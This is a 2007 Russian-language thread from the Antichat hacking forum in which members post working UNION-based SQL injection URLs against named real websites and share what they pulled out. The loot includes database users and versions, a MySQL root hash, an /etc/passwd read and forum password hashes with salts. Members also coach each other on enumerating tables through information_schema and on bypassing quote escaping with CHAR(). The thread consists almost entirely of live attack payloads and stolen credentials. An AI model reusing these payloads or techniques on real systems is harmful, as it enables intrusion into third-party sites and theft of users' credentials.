Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
02.06.2007, 14:19
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
2 Neorin
Непонял малость...
У fjuDao правильно (в отличии от тебя) запрос построен.
И в свете недавней темы:
Код:
http://contaximages.com/user.php?id=-1%20union%20select%201,2,3,4,users.user_id,6,concat(user_nickname,char(58),users.user_email,char(58),users.user_passwd),8,9,0,11%20from%20users/*
Код:
http://www.harphampix.com/v2/user.php?id=-1%20union%20select%201,2,3,4,users.user_id,6,concat(user_nickname,char(58),users.user_email,char(58),users.user_passwd),8,9,0,11%20from%20users/*
|
|
|
02.06.2007, 15:03
|
|
Новичок
Регистрация: 17.05.2007
Сообщений: 13
Провел на форуме:
2036698
Репутация:
20
|
|
Научно-исследовательский институт безопасности жизнедеятельности Республики Башкортостан
Код:
http://www.emercomrb.bashnet.ru/risla/index.php?p=-1243+union+select+1,2,3,4/*
USER: risla@localhost
DATABASE: risla
VERSION: 4.0.18-nt
Компания Стокмэн
Код:
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,user(),database(),4,version(),6,7/*
USER: kalitka@localhost
DATABASE: kalitka-plitka
VERSION: 5.0.32-Debian_7etch1-log
Последний раз редактировалось Пчел; 02.06.2007 в 16:04..
|
|
|
|
02.06.2007, 16:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 22.01.2007
Сообщений: 616
Провел на форуме:
7452489
Репутация:
1359
|
|
Сообщение от Пчел
Научно-исследовательский институт безопасности жизнедеятельности Республики Башкортостан
Код:
http://www.emercomrb.bashnet.ru/risla/index.php?p=-1243+union+select+1,2,3,4/*
USER: risla@localhost
DATABASE: risla
VERSION: 4.0.18-nt
Компания Стокмэн
Код:
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,user(),database(),4,version(),6,7/*
USER: kalitka@localhost
DATABASE: kalitka-plitka
VERSION: 5.0.32-Debian_7etch1-log
Уря наконец, попался 5 мускул )) можно поупражняться в использовании information_schema )
Код:
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,Table_name,database(),4,version(),6,7+from+information_schema.tables+limit+35,1/*
Получили таблицу ms_user
Попытался терь получить имена столбцов
Код:
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,column_name,database(),4,version(),6,7+from+information_schema.columns+where+table_name='ms_user'+limit+0,1/*
но что-то незаладилось, может чтото делаю неправильно ?
Последний раз редактировалось blackybr; 02.06.2007 в 16:42..
Причина: Экранируется кавычка... magic quotes = on. поэтому не можешь ее юзать, попробуй обойти =\
|
|
|
|
02.06.2007, 16:29
|
|
Новичок
Регистрация: 17.05.2007
Сообщений: 13
Провел на форуме:
2036698
Репутация:
20
|
|
Сообщение от geezer.code
Попытался терь получить имена столбцов
Код:
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,column_name,database(),4,version(),6,7+from+information_schema.columns+where+table_name='ms_user'+limit+0,1/*
но что-то незаладилось, может чтото делаю неправильно ? Да, что-то у меня тоже не получается вывести имена стобцов 
|
|
|
|
04.06.2007, 13:11
|
|
AMA - Level 2
Регистрация: 10.06.2006
Сообщений: 1,113
Провел на форуме:
17668503
Репутация:
5826
|
|
Код:
http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(database(),char(58),user(),char(58),version()),5,6,7/*
mysql.user:
Код:
http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(user,char(58),password),5,6,7+from+mysql.user+limit+1,1/*
root:1da2058b62d7a119
/etc/passwd:
Код:
http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,load_file(0x2f6574632f706173737764),5,6,7/*
163 таблицы:
Код:
http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,table_name,5,6,7+from+information_schema.tables+limit+163,1/*
forum.ibf_members_converge:
Код:
http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(converge_id,char(58),converge_pass_hash,char(58),converge_pass_salt),5,6,7+from+forum.ibf_members_converge+limit+0,1/*
1:33581792b4c389b0219866f27c29e3b8:~v-nI::: 4334925
lipskerov.phpbb_users:
Код:
http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(username,char(58),user_password),5,6,7+from+lipskerov.phpbb_users+limit+1,1/*
alien:5f58ac9c3b1c0c3ce51d3092816b96ed::: 4312034
magr.cms_members:
Колонки:
Код:
http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,column_name,5,6,7+from+information_schema.columns+where+table_name=char(99,109,115,95,109,101,109,98,101,114,115)+limit+0,1/*
Код:
id
status
name
full_name
phone_1
phone_2
phone_3
phone_4
fax
site
email
director_name
director_dolz
login
pass
in_org
sert
licen
full_info
Вывод инфы:
Код:
http://www.mydebut.ru/docs/index.phtml?id=-1+union+select+1,2,3,concat(id,char(58),name),5,6,7+from+magr.cms_members+limit+0,1/*
|
|
|
|
02.06.2007, 16:39
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
2 Пчел
Если не знаешь, что сказать, то лучше промолчать.
Код:
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,2,column_name,4,5,6,7+from+information_schema.columns+where+table_name=CHAR(109,115,95,117,115,101,114)+limit+0,1/*
Код:
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,concat(user_login,char(58),user_passwd,char(58),user_email),3,4,5,6,7+from+ms_user/*
Код:
http://www.kalitka-plitka.ru/news/?id=-12345+union+select+1,concat(login,char(58),name,char(58),password),3,4,5,6,7+from+ms_access_users/*
Последний раз редактировалось kamaz; 02.06.2007 в 16:51..
|
|
|
|
02.06.2007, 17:27
|
|
Новичок
Регистрация: 17.05.2007
Сообщений: 13
Провел на форуме:
2036698
Репутация:
20
|
|
2 kamaz
Я просто этим постом попросил о помощи, но понял что ты имел в виду. Кстати, спасибо что помог разобраться. Что бы не было офтопом:
General Store Publishing House!
Код:
http://www.gsph.com/index.php?ID=-12345+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/*&Lang=EN
USER: indelta_cms@75.126.146.102
DATABASE: indelta_gsph
VERSION: 5.0.37-standard-log |
|
|
|
02.06.2007, 19:46
|
|
Познающий
Регистрация: 17.02.2007
Сообщений: 92
Провел на форуме:
867300
Репутация:
69
|
|
Код HTML:
http://www.yamaha-hifi.de/index.php?lang=e&country=DE&idcat1=1&idcat2=-1+union+select+1,VERSION(),3,USER(),5/*
|
|
|
|
02.06.2007, 21:55
|
|
Познающий
Регистрация: 06.04.2007
Сообщений: 77
Провел на форуме:
1062869
Репутация:
136
|
|
Самые крупные БД когда либо я брал.
Сайт: www.visionlearning.com
Версия: 4.0.26
Колличесвто юзеров: 31001
PHP код:
http://www.visionlearning.com/library/flash_viewer.php?oid=-21+union+select+1,concat_ws(char(58),username,password,email),3,4+from+users+limit+31000,31001/*
ice1k: Убрал аптайм.ру. Не забываем посматривать антибоян:
_http://hack-shop.org.ru/sql.php
Ok.
Сайт:www.dotfiles.com
Версия:5.0.38
PHP код:
http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat(name,char(58),email)+from+user--
Хм,странно в information_schema.columns есть password
Но на деле не работет (.
Последний раз редактировалось V.I.P; 02.06.2007 в 22:59..
|
|
|
|
03.06.2007, 12:16
|
|
Познающий
Регистрация: 31.01.2007
Сообщений: 88
Провел на форуме:
631013
Репутация:
453
|
|
2 V.I.P
Колонка "password" не работает потому, что в таблице user ее нет. Есть только в таблице user с перфиксом mysql.
Код:
http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat(user,char(58),password)+from+mysql.user--
И еще в таблице users c различными перфиксами
Код:
http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat_ws(char(58),id,name,login,email,password)+from+radiant.users--
Код:
http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat_ws(char(58),id,name,login,email,password)+from+radiant_dev.users--
Код:
http://www.dotfiles.com/index.php?cat_id=6999999+union+select+1,2,3,4,5,6,concat_ws(char(58),id,name,password)+from+rblog.users%20limit%209500,1--
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид